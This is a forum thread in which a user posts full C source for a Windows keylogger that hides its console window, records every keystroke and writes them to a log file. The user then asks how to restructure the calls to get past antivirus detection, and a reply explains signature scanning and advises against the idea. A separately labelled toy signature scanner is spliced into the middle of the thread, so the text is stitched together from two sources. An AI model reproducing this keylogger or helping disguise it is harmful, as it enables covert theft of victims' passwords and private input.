Thread: Spyware ?

  1. #1
    INSANE INSIDE ekosix's Avatar
    Join Date
    May 2010
    Location
    Rio de Janeiro, Brazil
    Posts
    44

    Question Spyware ?

    I found this code on Google
    ... it's supposed to be a keylogger (I was just curious about a code example...)
    Code:
    //Includes
    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>
    #include <windowsx.h>
    #include <time.h>
    //Definitions
    #define LogLength 100
    #define FileName "logs.txt"
    //Prototype
    int get_keys(void);
    //MAIN
    int main(void)
    {
        //Stealth Stuff
        HWND stealth;
        AllocConsole();
        stealth=FindWindowA("ConsoleWindowClass",NULL);
        ShowWindow(stealth,0);

        // I.D.K. Stuff
        FILE *file;
        file=fopen(FileName,"a+");
        time_t theTime=time(0);
        fputs("\n#\n##\n###\n#####################\n###Started Logging @@@ ", file);
        fputs(ctime(&theTime),file);
        fputs("\n#####################\n###\n##\n#\n", file);
        fclose(file);

        //Logging Stuff
        int t = get_keys();
        return t;
    }
    int get_keys()
    {
        int freadindex;
        char *buf;
        long len;
        FILE *file;
        file=fopen(FileName,"a+");
        short character;
        while(1)
        {
            Sleep(5);
            for(character=8;character<=222;character++) {
                if(GetAsyncKeyState(character)==-32767) {
                    FILE *file;
                    file=fopen(FileName,"a+");
                    if(file==NULL) {
                        return 1;
                    }
                    if(file!=NULL) {
                        if((character>=39)&&(character<=64)) {
                            fputc(character,file);
                            fclose(file);
                            break;
                        }
                        else if((character>64)&&(character<91)) {
                            character+=32;
                            fputc(character,file);
                            fclose(file);
                            break;
                        }
                        else
                        {
                            switch(character)
                            {
                            case VK_SPACE:
                                fputc(' ',file);
                                fclose(file);
                                break;
                            case VK_SHIFT:
                                fputs("[SHIFT]",file);
                                fclose(file);
                                break;
                            case VK_RETURN:
                                fputs("\n[ENTER]\n",file);
                                fclose(file);
                                break;
                            case VK_BACK:
                                fputs("[BACKSPACE]",file);
                                fclose(file);
                                break;
                            case VK_TAB:
                                fputs("[TAB]",file);
                                fclose(file);
                                break;
                            case VK_CONTROL:
                                fputs("[CTRL]",file);
                                fclose(file);
                                break;
                            case VK_DELETE:
                                fputs("[DEL]",file);
                                fclose(file);
                                break;
                            case VK_OEM_1:
                                fputs(":;",file);
                                fclose(file);
                                break;
                            case VK_OEM_2:
                                fputs("?",file);
                                fclose(file);
                                break;
                            case VK_OEM_3:
                                fputs("~",file);
                                fclose(file);
                                break;
                            case VK_OEM_4:
                                fputs("{\r\n",file);
                                fclose(file);
                                break;
                            case VK_OEM_5:
                                fputs("\\",file);
                                fclose(file);
                                break;
                            case VK_OEM_6:
                                fputs("}",file);
                                fclose(file);
                                break;
                            case VK_OEM_7:
                                fputs("\"",file);
                                fclose(file);
                                break;
                            case 187:
                                fputc('+',file);
                                fclose(file);
                                break;
                            case 188:
                                fputc(',',file);
                                fclose(file);
                                break;
                            case 189:
                                fputc('-',file);
                                fclose(file);
                                break;
                            case 190:
                                fputc('.',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD0:
                                fputc('0',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD1:
                                fputc('1',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD2:
                                fputc('2',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD3:
                                fputc('3',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD4:
                                fputc('4',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD5:
                                fputc('5',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD6:
                                fputc('6',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD7:
                                fputc('7',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD8:
                                fputc('8',file);
                                fclose(file);
                                break;
                            case VK_NUMPAD9:
                                fputc('9',file);
                                fclose(file);
                                break;
                            case VK_CAPITAL:
                                fputs("\n[CAPSLOCK]\n",file);
                                fclose(file);
                                break;
                            default:
                                fclose(file);
                                break;
                            }
                        }
                    }
                }
            }
            fclose(file);
        }

        return EXIT_SUCCESS;
    }
    When I compiled it, my antivirus blocked it as a Trojan...
    But the question is: HOW and WHY did that happen?

  2. #2
    Banned
    Join Date
    Aug 2010
    Location
    Ontario Canada
    Posts
    9,547
    When I compiled it, my antivirus blocked it as a Trojan...
    But the question is: HOW and WHY did that happen?
    Oh probably because it IS a virus that is commonly dropped by trojans.

    It opens an invisible window, it accesses the keyboard directly, it writes to a file... all the stuff of keylogging.

    Your curiosity about the code is understandable... but so is the operating system's reaction.

  3. #3
    INSANE INSIDE ekosix's Avatar
    Join Date
    May 2010
    Location
    Rio de Janeiro, Brazil
    Posts
    44
    So, you're saying my antivirus detected an uncommon activity from the executable through its actions?

  4. #4
    Banned
    Join Date
    Aug 2010
    Location
    Ontario Canada
    Posts
    9,547
    Quote Originally Posted by ekosix View Post
    So, you're saying my antivirus detected an uncommon activity from the executable through its actions?
    None of the actions by itself is a problem. It's not about "uncommon", it's about "dangerous". It detected the combination of actions and decided it's not a good thing.

    Virus scanners for the most part work on known patterns (called "signatures") within code. Certain combinations of machine code will trigger a pattern match and off it goes.
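
    The point made in replies #2 and #4, that a scanner matches known patterns and that it is the combination of otherwise harmless actions that trips the verdict, can be illustrated with a toy detector. The following is an added example, not code from the thread or from any real antivirus product: it scans a byte buffer for a handful of API names as they would appear in a PE import table and only reports a keylogger-like verdict when the keyboard-polling, window-hiding and file-writing patterns occur together. The signature list, the weights, the score threshold and the four constructed sample "import tables" are all assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the thread: a toy string-signature scanner.
 * Signatures are API names; which names and weights to use is an assumption. */
typedef struct {
    const char *name;  /* byte pattern to look for */
    int weight;        /* how suspicious the pattern is on its own */
} signature_t;

static const signature_t SIGS[] = {
    { "GetAsyncKeyState", 2 },  /* bit 0: polls keyboard state */
    { "ShowWindow",       1 },  /* bit 1: can hide a window */
    { "AllocConsole",     1 },  /* bit 2 */
    { "FindWindowA",      1 },  /* bit 3 */
    { "fopen",            1 },  /* bit 4: writes to a file */
};
#define NSIGS (sizeof SIGS / sizeof SIGS[0])

enum verdict { CLEAN = 0, SUSPICIOUS = 1, FLAGGED = 2 };

/* Byte-wise search; unlike strstr it tolerates embedded NULs in a binary blob. */
static int contains(const unsigned char *buf, size_t len, const char *pat)
{
    size_t plen = strlen(pat);
    if (plen == 0 || plen > len) return 0;
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0) return 1;
    return 0;
}

/* Returns a bitmask with bit i set when SIGS[i] occurs in the buffer. */
unsigned match_signatures(const unsigned char *buf, size_t len)
{
    unsigned mask = 0;
    for (size_t i = 0; i < NSIGS; i++)
        if (contains(buf, len, SIGS[i].name)) mask |= 1u << i;
    return mask;
}

/* FLAGGED only when key polling, window hiding and file writing co-occur;
 * otherwise SUSPICIOUS when the summed weights reach 4 (assumed threshold). */
enum verdict classify(const unsigned char *buf, size_t len)
{
    unsigned mask = match_signatures(buf, len);
    int score = 0;
    for (size_t i = 0; i < NSIGS; i++)
        if (mask & (1u << i)) score += SIGS[i].weight;

    int polls_keys   = (mask & (1u << 0)) != 0;
    int hides_window = (mask & (1u << 1)) != 0;
    int writes_file  = (mask & (1u << 4)) != 0;
    if (polls_keys && hides_window && writes_file) return FLAGGED;
    return score >= 4 ? SUSPICIOUS : CLEAN;
}

/* Constructed sample "import tables": NUL-separated name lists, the way a
 * loader would see them strung through a binary. Not real files. */
static const unsigned char KEYLOGGER_LIKE[] =
    "KERNEL32.dll\0AllocConsole\0USER32.dll\0FindWindowA\0ShowWindow\0"
    "GetAsyncKeyState\0MSVCRT.dll\0fopen\0fputs\0fclose\0";
static const unsigned char CONSOLE_APP[] =
    "KERNEL32.dll\0GetStdHandle\0WriteFile\0MSVCRT.dll\0fopen\0printf\0";
static const unsigned char GAME_INPUT[] =
    "USER32.dll\0GetAsyncKeyState\0ShowWindow\0OPENGL32.dll\0glClear\0";
static const unsigned char HIDDEN_CONSOLE[] =
    "KERNEL32.dll\0AllocConsole\0USER32.dll\0FindWindowA\0ShowWindow\0"
    "GetAsyncKeyState\0";

static const char *verdict_name(enum verdict v)
{
    return v == FLAGGED ? "FLAGGED" : v == SUSPICIOUS ? "SUSPICIOUS" : "CLEAN";
}

int main(void)
{
    printf("keylogger-like: %s\n", verdict_name(classify(KEYLOGGER_LIKE, sizeof KEYLOGGER_LIKE)));
    printf("console app:    %s\n", verdict_name(classify(CONSOLE_APP, sizeof CONSOLE_APP)));
    printf("game input:     %s\n", verdict_name(classify(GAME_INPUT, sizeof GAME_INPUT)));
    printf("hidden console: %s\n", verdict_name(classify(HIDDEN_CONSOLE, sizeof HIDDEN_CONSOLE)));
    return 0;
}
```

    The game sample imports the same keyboard-polling and window APIs but never writes a file, so it stays clean; the hidden-console sample scores high enough to be suspicious without reaching the keylogger verdict; only the buffer with all three behaviours is flagged. Real products layer many more signatures, emulation and behavioural monitoring on top of this idea, which is why the "cold war" described in reply #6 never settles.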

  5. #5
    INSANE INSIDE ekosix's Avatar
    Join Date
    May 2010
    Location
    Rio de Janeiro, Brazil
    Posts
    44
    Cool!
    Well, so if I want or need to avoid this would it work if I make them "indirectly" or to create some methods "between" them just to outwit?

  6. #6
    Banned
    Join Date
    Aug 2010
    Location
    Ontario Canada
    Posts
    9,547
    Quote Originally Posted by ekosix View Post
    Cool!
    Well, so if I want or need to avoid this would it work if I make them "indirectly" or to create some methods "between" them just to outwit?
    Probably not. Virus writers and virus scanners are in a "cold war"... Or as it was once said: "My kung foo is better than their kung foo"... and everything is in a state of constant improvement (or worsening depending which side you're on).

    Basically the best advice I can give you is to stop messing around with virus code.
